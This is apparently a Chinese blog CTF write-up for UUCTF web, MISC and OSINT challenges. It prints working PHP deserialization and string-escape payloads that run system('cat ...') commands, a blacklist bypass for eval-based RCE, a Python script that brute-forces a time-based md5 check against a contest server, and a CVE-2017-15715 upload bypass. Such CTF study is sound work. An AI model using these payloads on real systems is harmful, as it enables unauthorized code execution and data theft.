• UUCTF(公共赛道)

    目录

    ez_rce

    ez_unser

    ezsql

    ez_upload

    apache 文件上传 (CVE-2017-15715)漏洞

    funmd5

    ezpop

    我们为什么要用字符串逃逸呢

    我们要逃逸什么呢?

    要逃逸什么呢

    phonecode

    ez_rce

    1. 居然都不输入参数,可恶!!!!!!!!!
    2.  
    4. ## 放弃把,小伙子,你真的不会RCE,何必在此纠结呢????????????
    5. if(isset($_GET['code'])){
    6.     $code=$_GET['code'];
    7.     if (!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$code)){
    8.         echo '看看你输入的参数!!!不叫样子!!';echo '
      '      ;
    9.         eval($code);
    10.     }
    11.     else{
    12.         die("你想干什么?????????");
    13.     }
    14. }
    15. else{
    16.     echo "居然都不输入参数,可恶!!!!!!!!!";
    17.     show_source(__FILE__);
    18. }
    19.

    sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell禁用了许多的命令,但是没有禁用掉\,这不就可以进行转义了吗。

    然后看到`没有被禁用,输出语句的话print_r还可以使用

    然后ca\t 获得flag

     

     printf作为输出也是可以的

    ez_unser

    2. show_source(__FILE__);
    3.  
    4. ###very___so___easy!!!!
    5. class test{
    6.     public $a;
    7.     public $b;
    8.     public $c;
    9.     public function __construct(){
    10.         $this->a=1;
    11.         $this->b=2;
    12.         $this->c=3;
    13.     }
    14.     public function __wakeup(){
    15.         $this->a='';
    16.     }
    17.     public function __destruct(){
    18.         $this->b=$this->c;
    19.         eval($this->a);
    20.     }
    21. }
    22. $a=$_GET['a'];
    23. if(!preg_match('/test":3/i',$a)){
    24.     die("你输入的不正确!!!搞什么!!");
    25. }
    26. $bbb=unserialize($_GET['a']);

    额这道题前不久刚碰到过这种类型的,还是学长给我解答了,其实从正则看test:3是不可能绕过wakeup的,所以我们需要执行完wakeup之后然后

    $t=new test();
$t->b=&$t->a;
$t->c="system('cat /fffffffffflagafag');";
echo serialize($t);

    思路很简单,就是可能被以前的思想限制了,直接用a的地址空间,然后a和b用的一个内存变量,所以给b赋值相当于给a赋值,就得到了

    ezsql

    打开界面输了一段语句,发现额密码在前面并且运用了倒序,然后or被过滤了,这里过滤推测是不报错,然后把过滤的字符换成空串 

    ez_upload

    一道文件上传的题目考察的是

    apache 文件上传 (CVE-2017-15715)漏洞

    漏洞影响版本,Apache HTTPD 2.4.0~2.4.29

    应为apache解析文件后缀的时候,是从右往左解析后缀,如果我们上传的文件后缀是.php.jpg的话,就是解析的jpg,然后这个文件依然会是php版本的,所以导致漏洞

    funmd5

    2. error_reporting(0);
    3. include "flag.php";
    4. $time=time();
    5. $guessmd5=md5($time);
    6. $md5=$_GET["md5"];
    7. if(isset($md5)){
    8.     $sub=substr($time,-1);
    9.     $md5=preg_replace('/^(.*)0e(.*)$/','${1}no_science_notation!${2}',$md5);
    10.     if(preg_match('/0e/',$md5[0])){
    11.         $md5[0]=substr($md5[0],$sub);
    12.         if($md5[0]==md5($md5[0])&&$md5[1]===$guessmd5){
    13.             echo "well!you win again!now flag is yours.
      "      ;
    14.             echo $flag;
    15.         }
    16.         else{
    17.             echo $md5[0];
    18.             echo "oh!no!maybe you need learn more PHP!";
    19.         }
    20.     }
    21.     else{
    22.         echo "this is your md5:$md5[0]
      "      ;
    23.         echo "maybe you need more think think!";
    24.     }
    25. }
    26. else{
    27.     highlight_file(__FILE__);
    28.     $sub=strlen($md5[0]);
    29.     echo substr($guessmd5,0,5)."
      "      ;
    30.     echo "plase give me the md5!";
    31. }
    32. ?>
    33. 366c0
    34. plase give me the md5!

       $md5=preg_replace('/^(.*)0e(.*)$/','${1}no_science_notation!${2}',$md5);
        if(preg_match('/0e/',$md5[0])){

    可以先看这两行,是肯定会发生冲突的,所以我们要做的就是绕过第一个正则替换,然后直接执行第二个就可以

    :md5[1] 的值为 guessmd5 的值 , guessmd5 的值为 time() 获取到的值 , 所以需要保证每次提交时的
    md5[1] 的值都等于 md5(time()) 的值
    绕过 :md5[0] 的绕过主要是对 preg_replace() 绕过 ,%a 换行符绕过 . 但是此时多了一个换行符 , 题目又提供了
    一个 $md5[0]=substr($md5[0],$sub) ; , 只需要 $sub=1 即可删除 %0a 的值 , sub 的值是由时间的最后一
    位决定的 (``) 所以只需要保证 time 时间戳最后一位为 1 即可
    附上脚本 
    1. import requests
    2. import time as time
    3. import hashlib
    4. def send():
    5.     #url="http://localhost/uuctf/funmd5"
    6.     url="http://43.143.7.97:28076/"
    7.     data="md5[0]=%0a0e215962017&md5[1]={}".format(str(hashlib.md5(str(int(time.time())).encode("utf-8")).hexdigest()))
    8.     urltext=requests.get(url,data)
    9.     print(urltext.text)
    10.     if "NSSCTF" in urltext.text:
    11.         print(urltext.text)
    12.         exit()
    13. def timeguess():
    14.     time.sleep(0.5)
    15.     print(int(time.time()))
    16. for i in range(100):
    17.     timeguess()
    18.     send()

    ezpop

    2. //flag in flag.php
    3. error_reporting(0);
    4. class UUCTF{
    5.     public $name,$key,$basedata,$ob;
    6.     function __construct($str){
    7.         $this->name=$str;
    8.     }
    9.     function __wakeup(){
    10.     if($this->key==="UUCTF"){
    11.             $this->ob=unserialize(base64_decode($this->basedata));
    12.         }
    13.         else{
    14.             die("oh!you should learn PHP unserialize String escape!");
    15.         }
    16.     }
    17. }
    18. class output{
    19.     public $a;
    20.     function __toString(){
    21.         $this->a->rce();
    22.     }
    23. }
    24. class nothing{
    25.     public $a;
    26.     public $b;
    27.     public $t;
    28.     function __wakeup(){
    29.         $this->a="";
    30.     }
    31.     function __destruct(){
    32.         $this->b=$this->t;
    33.         die($this->a);
    34.     }
    35. }
    36. class youwant{
    37.     public $cmd;
    38.     function rce(){
    39.         eval($this->cmd);
    40.     }
    41. }
    42. $pdata=$_POST["data"];
    43. if(isset($pdata))
    44. {
    45.     $data=serialize(new UUCTF($pdata));
    46.     $data_replace=str_replace("hacker","loveuu!",$data);
    47.     unserialize($data_replace);
    48. }else{
    49.     highlight_file(__FILE__);
    50. }
    51. ?>

    这是一个pop反序列化和字符串逃逸共同结合的题目

    $data_replace=str_replace("hacker","loveuu!",$data);

    一般这种替换有了长度的变换,就极大的可能存在字符串逃逸

    首先 这道题先构造rce的链子

    2. //flag in flag.php
    3. error_reporting(0);
    4. class output{
    5.     public $a;
    6.     function __toString(){
    7.         $this->a->rce();
    8.     }
    9. }
    10. class nothing{
    11.     public $a;
    12.     public $b;
    13.     public $t;
    14.     function __wakeup(){
    15.         $this->a="";
    16.     }
    17.     function __destruct(){
    18.         $this->b=$this->t;
    19.         die($this->a);
    20.     }
    21. }
    22. class youwant{
    23.     public $cmd="system('ls /')";
    24.     function rce(){
    25.         eval($this->cmd);
    26.     }
    27. }
    28. $n=new nothing();
    29. $n->b=&$n->a;
    30. $n->t=new output();
    31. $n->t->a=new youwant();
    32. echo serialize($n);
    33. echo base64_encode(serialize($n));
    34. ?>

    O:7:"nothing":3:{s:1:"a";N;s:1:"b";R:2;s:1:"t";O:6:"output":1:{s:1:"a";O:7:"youwant":1:{s:3:"cmd";s:14:"system('ls /')";}}}Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjE0OiJzeXN0ZW0oJ2xzIC8nKSI7fX19 

    这里之所以要base64加密是因为,

                $this->ob=unserialize(base64_decode($this->basedata));

    这里有base64_decode解密的操作, 所以我们要进行加密的操作,然后这条链子构造完成以后因为 

    if($this->key==="UUCTF"){
                $this->ob=unserialize(base64_decode($this->basedata));
            }
            else{
                die("oh!you should learn PHP unserialize String escape!");
            }
        }

    在这个类中会进行一次反序列化,然后需要满足key==UUCTF才可以进行这个反序列化

    2. //flag in flag.php
    3. error_reporting(0);
    4. class UUCTF{
    5.     public $name,$key,$basedata,$ob;
    6.     function __wakeup(){
    7.     if($this->key==="UUCTF"){
    8.             $this->ob=unserialize(base64_decode($this->basedata));
    9.         }
    10.         else{
    11.             die("oh!you should learn PHP unserialize String escape!");
    12.         }
    13.     }
    14. }
    15. class output{
    16.     public $a;  // a=new youwant();
    17.     function __toString(){
    18.         $this->a->rce();
    19.     }
    20. }
    21. class nothing{
    22.     public $a;
    23.     public $b;
    24.     public $t;
    25.     function __wakeup(){
    26.         $this->a="";  // a = new output();
    27.     }
    28.     function __destruct(){
    29.         $this->b=$this->t;
    30.         die($this->a);  // toString
    31.     }
    32. }
    33. class youwant{
    34.     public $cmd; // system("cat flag.php");
    35.     function rce(){
    36.         eval($this->cmd);
    37.     }
    38. }
    39. //Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjIzOiJzeXN0ZW0oJ2NhdCBmbGFnLnBocCcpOyI7fX19==
    40. $a = new UUCTF();
    41. $a->name = "jycxk";
    42. $a->key = "UUCTF";
    43. $a->basedata = "Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjIzOiJzeXN0ZW0oJ2NhdCBmbGFnLnBocCcpOyI7fX19=";
    44. echo serialize($a);

    O:5:"UUCTF":4:{s:4:"name";s:5:"jycxk";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:164:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjE0OiJzeXN0ZW0oJ2xzIC8nKSI7fX19";s:2:"ob";N;}

    得到了,然后我们就要想

    1. $pdata=$_POST["data"];
    2. if(isset($pdata))
    3. {
    4.     $data=serialize(new UUCTF($pdata));
    5.     $data_replace=str_replace("hacker","loveuu!",$data);
    6.     unserialize($data_replace);
    7. }else{
    8.     highlight_file(__FILE__);
    9. }

    如何用这些进行字符串逃逸的功能,首先传入了一个data,然后new UUCTF($pdata)

    function __construct($str){
            $this->name=$str;
        }

    这里的$str接受$pdata的值,所以这里的name赋值了我们传入的东西

    我们为什么要用字符串逃逸呢

    如果我们只是按照循规蹈矩,传入值只会增加name的长度,恶意代码被包含在里面,所以我们需要字符串逃逸 

    我们要逃逸什么呢?

    要逃逸什么呢

    O:5:"UUCTF":4:{s:4:"name";s:5:"jycxk";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:164:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjE0OiJzeXN0ZW0oJ2xzIC8nKSI7fX19";s:2:"ob";N;}

    就是逃逸蓝色字符的内容,然后查字符,每一个hacker就逃逸一个字符,所以需要逃逸多少个字符就需要逃逸多少个hacker

    O:5:"UUCTF":4:{s:4:"name";s:5:"jycxk";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:164:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjE0OiJzeXN0ZW0oJ2xzIC8nKSI7fX19";s:2:"ob";N;}

    这里改变的就是name的值,然后利用name值进行逃逸

    hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:177:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjIzOiJzeXN0ZW0oJ2NhdCBmbGFnLnBocCcpOyI7fX19=";s:2:"ob";N;}

    然后我们传进去就会变成这样

    2.  
    3.  
    4. O:5:"UUCTF":4:{s:4:"name";s:1659:"loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!loveuu!";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:177:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjIzOiJzeXN0ZW0oJ2NhdCBmbGFnLnBocCcpOyI7fX19=";s:2:"ob";N;}";s:3:"key";N;s:8:"basedata";N;s:2:"ob";N;}

    这里的1659是love u u!的长度,不包含后面的所以后面的就会逃逸出来

    然后最后就可以达到我们的rce,弄了几天它终于出来了呜呜呜

    phonecode

    打开是一个登录的界面,然后我们随便输入了以后发现了提示

    试了几次里面的hint是不同的数字,然后结合下一次必然命中!

    所以我们想到了会不会是随机数,php_seed 

    然后感觉会不会是用上面的手机号当作随机种子,然后提示就是第一次的

    输入手机号后提示 hint 10 位整数 , mt_rand() 比较熟悉的反应出 , mt_srand( 参数 ) 的种子为手机号的
    时候 , 输出的 hint 为第一次 mt_rand() 的值 , mt_rand() 已经运行了一次 .
    所以输入的验证码即为第二次 mt_rand() 的值 ( 下一次必然命中 )

    echo "提交".mt_rand();

    hint:329028719
提交2027400820

    果然第一次生成的就是提示给我们的值, 然后提交第二次生成的随机值就可以获得flag了

     MISC

    七七的故事

    57q15L2/5Lya6YGX5b+Y77yM5Y205LuN6KaB5Yqq5Yqb6K6w5L2P5L2g77yM5ZOq5oCV5ZG95Luk6Ieq5bex6L+Z5Liq6K+06K+d5LiN5bim5oSf5oOF55qE5a2p5a2Q77yM5Y205oC76IO95oiz5Yiw5Lq65Lus5YaF5b+D5pyA5p+U6L2v55qE6YOo5YiG77yM5LiD5LiD77yM5Y6f56We5Lit55qE5LiA5Liq5Y+v54ix55qE5bCP5YO15bC477yM5Zyo6I2v5bqX5biu55m95pyv55qE5pW055CG6I2v5p2Q77yM5LiD5LiD5aSN5rS75ZCO77yM5Lq65Lus57uP5bi45a+5552A5LuW6K+077ya4oCc5oiR5LiA5Yu65LiJ6Iqx5reh5aW277yB77yB77yB4oCd6Jm954S25pe25bi45Lya5b+Y6K6w6I2v5p2Q5pGG5pS+55qE5L2N572u77yM5L2G5piv55m95pyv5Y205LuO5p2l5rKh5pyJ6LW25LiD5LiD56a75byA77yM5Zug5Li65LiD5LiD5pep5bey57uP5LiN55+l6YGT77yM5a6277yM5Zyo5LuA5LmI5Zyw5pa55LqG44CC5pu+57uP55qE5LiD5LiD5Y+q5LiN6L+H5piv5LiA5Liq5rKh5pyJ54Om5oG855qE5aWz5a2p77yM5LiN6L+H5Li65LqG55Sf6K6h77yM5aW56ZyA6KaB6IOM6LW36IOM56+T77yM5Yiw5aSn5bGx5Lit6YeH6I2v77yM6ICM5Zyo5LiA5qyh6YeH6I2v55qE6L+H56iL5Lit77yM5LiN5bm45Y+R55Sf5LqG44CC5LiD5LiD5oSP5aSW5pGU5YCS77yM5beo5aSn55qE55a855eb6K6p6L+Z5Liq5bCP5aWz5a2p55WZ5LiL5LqG55y85rOq77yM6YKj5pe25YCZ5aW56L+Y5Lya5oSf6KeJ5Yiw55eb44CC5LiD5LiD5o2C552A5Lyk5Y+j77yM5YeG5aSH5Yiw6ZmE6L+R55qE5bGx5rSe5Lit5LyR5oGv5LiA5LiL77yM5Y205oSP5aSW5Y235YWl5LqG55KD5pyI55qE56We6a2U5LmL5oiY5Lit44CC6YKj5pe25YCZ55qE55KD5pyI5bm25LiN5a6J5a6B77yM6Jm954S25pyJ5bid5ZCb55qE5bqH5oqk77yM5L2G5Zyo5LiA5Lqb5YGP6L+c55qE5Zyw5pa577yM6L+Y5q6L5a2Y552A5paX5LqJ77yM5LiD5LiD5LiN6L+H5piv5YW25Lit5LiA5Liq44CC56We6a2U5LmL6Ze055qE5paX5LqJ77yM5L2/5aSn5Zyw5pmD5Yqo77yM5bGx5L2T5bSp5aGM77yM5LiD5LiD5omA5Zyo55qE5bGx5rSe77yM5byA5aeL5bSp5Z2P77yM5beo55+z5LiN5pat6JC95LiL77yM5Zyo5LiA6Zi16L2w6bij5aOw5Lit77yM5LiD5LiD5o6J6L+b5rex5riK77yM5aWE5aWE5LiA5oGv44CC5Zyo5LiD5LiD5r+S5Li05q275Lqh55qE5pe25YCZ77yM5aW55Ly45Ye65omL77yM5Ly85LmO5oOz6KaB5oy955WZ6L+Z576O5aW95Lq65LiW6Ze044CC6Z2i5a+55q275Lqh55qE5oGQ5oOn44CB5a+55b6F5Lqy5Lq655qE5oCd5b+177yM6K6p6L+Z5Liq5bCP5aWz5a2p54iG5Y+R5Ye65LqG5oOK5Lq655qE5rGC55Sf5qyy5pyb77yM56We5LmL55y85oKE54S25p2l5Yiw5aW555qE6Lqr6L6544CC56We6a2U55qE5oiY5LqJ57uT5p2f5LqG77yM6ICM55KD5pyI5LyX5LuZ5Lmf5Y+R546w5LqG6L+Z5Liq5ZG95oKs5LiA57q/55qE5bCP5aWz5a2p77yM5YaF5b+D5pyJ5Lqb5LiN5b+N55Sf5ZG95bCx6L+Z5qC36YCd5Y6777yM5L6/55So6Ieq6Lqr55qE5LuZ5Yqb5biu5Yqp5LiD5LiD6YeN5Zue5Lq66Ze077yM5L2G5rKh5oOz5Yiw5LiD5LiD6KKr5rC46L+c5Zyo55Sf5LiO5q2755qE5aS557yd5Lit77yM6Zm35YWl56m65YmN55qE55av54uC5LmL5Lit44CCZmxhZ3s2NjZjNjE2NzdiNTQ2ODMxNzM1ZjMxNzM1ZjY1NjE3Mzc5NWY2ZDMxNzM2MzdkPT19

    进行  base64->hex转字符串 获得flag

    Where is flag?

    打开文件然后,看看数据流里面有什么东西

    看一下协议分级里的数据包,然后追踪http流

    发现了一个zip压缩包,保存到

     文件-》导出-》http流,然后保存到桌面

     然后用010解压文件

     IHER是png里面的东西,所以添加png的文件头

    89 50 4E 47 0D 0A 1A 0A。可能我的010版本的问题,只能ctrl+shift+c复制出来,用记事本加上在ctrl+shirt+v复制到010

    然后打开文件发现了一个二维码

    扫描二维码,得出flag is not here!!!

    然后问了一个师傅说会有隐写,用网站解码,

     得到flag

    略略略来抓我呀(OSINT)

    社工题,通过图片获得经纬度定位,然后用百度识图识别出饭店名称,在定位的附近查看酒店

  • 相关阅读:
    2022选择了交大,回顾这一年的成长
    git 设置ignore文件
    小程序源码:王者荣耀改名神器-多玩法安装简单
    CTO说不建议我使用SELECT * ,这是为什么?
    某猫投诉app逆向 【一鱼多吃app逆向】
    Linux部署Spark 本地模式
    labelimg标注的VOC格式标签xml文件和yolo格式标签txt文件相互转换
    【线性方程】高斯-赛德尔送代法求解线性方程组
    CleanMyMac X4最新版测评效果及功能下载
    React-router-dom 6总结
  • 原文地址:https://blog.csdn.net/qq_62046696/article/details/127673877